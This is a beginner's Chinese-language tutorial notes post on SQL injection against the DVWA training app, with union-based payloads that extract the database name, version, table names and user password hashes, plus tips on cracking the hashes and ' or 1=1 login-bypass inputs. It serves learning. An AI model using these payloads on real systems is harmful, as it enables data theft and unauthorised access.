小白學了一點簡單的SQL注入，做了點筆記，感覺挺詳細，希望能幫助到學習的夥伴。大佬勿噴，有不足多多的指教。

實驗原理

SQL注入攻擊是通過將惡意的SQL查詢或新增語句插入到應用的輸入引數中，再在後臺SQL伺服器上解析執行進行的攻擊，它目前是黑客對資料庫進行攻擊的最常用的手段之一。本課程將帶你從介紹web應用執行原理開始，一步一步理解SQL注入的由來，原理和攻擊方式。

SQL注入帶來的威脅主要有如下幾點：
■猜解後臺資料庫，這是利用最多的方式，盜取網站的敏感資訊。
■繞過認證，列如繞過驗證登入網站後臺。
■注入可以藉助資料庫的儲存過程進行提權等操作。

4.sql注入示例一.猜解資料庫

看看後臺中到底執行了什麼樣的SQL語句呢？點選view-source檢視原始碼：

實際執行的SQL語句是：
select first_name,last_name from users where user_id= ='1';

（這裡我建議先學一下MySQL這樣會理解的更好一點，這裡我推薦一下我在前面學習的mysql筆記：）

我們是通過控制引數id的值來返回我們需要的資訊。如果我們不按常理出牌，比如在輸入框中輸入1‘ order by 1# 實際執行的SQL語句會變成：
select first_name,last_name from users where user_id = '1' order by 1#';(按照Mysql語法，#後面的會被註釋掉，使用這種方法遮蔽掉後面的單引號，避免語法錯誤)
語句的意思就是查詢users表中的first_name,last_name中的user_id為1的資料並按第一欄位排行（order by 語句用於根據指定的列對結果集進行排序，語句預設是按照升序記錄進行排序的）。
輸入 1’ order by 1#和1‘ order by 2#時都返回正常：

當輸入1’ order by 3#時，返回出錯：

由此可知，users表中只有兩個欄位，資料為兩列。接下來我們使用union select 聯合查詢繼續獲取資訊。union運算子可以將兩個或者兩個以上select語句的查詢結果集合合併成一個結果集顯示，即執行聯合查詢。需要注意在使用union查詢的時候需要和主查詢的列數相同，而我們之前已經知道了主查詢列數為2，接下來就好辦了。輸入1‘ union select database（），user()#進行查詢：
database()將會返回當前網站所使用的資料庫名字。
user()將會返回執行當前查詢的使用者名稱。

實際執行的SQL語句是：
select first_name,last_name from users where user_id = '1' union sesect database(),user()#';

通過上圖的返回資訊，我們成功獲取到：
■當前網站使用的資料庫為dvwa。
■當前執行查詢使用者名稱為[email protected]
同理我們在輸入1’ union select version(),@@version_compile_os#進行查詢：
■version()獲取當前資料庫的版本
■@@version_compile_os獲取當前作業系統。

實際執行的SQL語句是：
select first_name,last_name from users where user_id = '1' union select version(),@@version_compile_os#';

通過上面的圖中返回資訊，我們可以知道：

■當前的資料庫版本為：5.5.50-0Ubuntu0.14.04.1

■當前的作業系統為：debian-linux-gun

接下來我們嘗試獲取dvwa資料庫中的表名。information_schema是mysql自帶的一張表，這張資料表儲存了Mysql伺服器所有資料庫的資訊，如資料庫名、資料庫的表、表欄的資料型別與訪問許可權等。該資料庫擁有一個名為tables的資料表，該表包含兩個欄位table_name和table_schema,分別記錄DBMS中的儲存的表名和表名所在的資料庫。

我們輸入1‘ union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#進行查詢：
實際執行的SQL語句是
select first_name,last_name from users where user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#';

通過上圖返回資訊，我們可以知道：

■dvwa資料庫有兩個資料表，分別是guestbook和users。
有些人啊覺得這些資訊還是不夠，那麼我們接下來嘗試獲取重量級的使用者名稱，密碼，有經驗的大家可以大膽的猜測users表的欄位為user和password，所以輸入：1’ union select user,password from users#進行查詢：實際執行的SQL語句是：
select first_name,last_name from users where user_id = '1' union select user,password from users#';

可以看到成功的爆出使用者名稱，密碼，密碼採用md5進行加密，可以到www.cmd5.com進行解密。

Sql 注入例項二.驗證繞過

接下來我們再試試另一個利用SQL漏洞繞過登入驗證的實驗。

給我的是一個普通的登入頁面，只要輸入正確的使用者名稱和密碼就能登入成功。我們先嚐試所以輸入使用者名稱123，密碼123登入：
嗯，就是隨手一試，也就隨便給了我一個錯誤的介面。23333

從錯誤頁面中我們無法獲取到任何資訊。看看後臺程式碼如何做實驗的：

實際執行的操作時：

select * from users where username='123' and password='123'

當查詢到資料表中存在同時滿足username和password欄位時，會返回登入成功。按照第一個實驗的思路，我們嘗試在使用者名稱中輸入123‘ or 1=1#;

為什麼能夠登入成功呢？因為實際執行的語句是：
 select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'
一樣按照Mysql語法，#後面的內容會被忽略，所以以上語句等同於（實際上密碼框裡不輸入任何東西一樣）：
select * from users where username='123' or 1=1
由於判斷語句 or 1=1恆成立，所以結果當然返回真值，登入成功。我們再嘗試不用#遮蔽引號，採用手動閉合的方式：我們嘗試在使用者名稱中輸入123’ or ‘1’=‘1.密碼同樣輸入123’ or ‘1’=‘1（不能少了單引號，否則會有語法錯誤）：
實際執行的SQL語句是：

select * from users where username ='123' or '1' ='1' and password='123' or '1'='1'
看到了嗎？兩個or語句使and前後兩個判斷永遠恆等與真，這所以能夠成功登入。

                                                   歡迎關注微信公眾號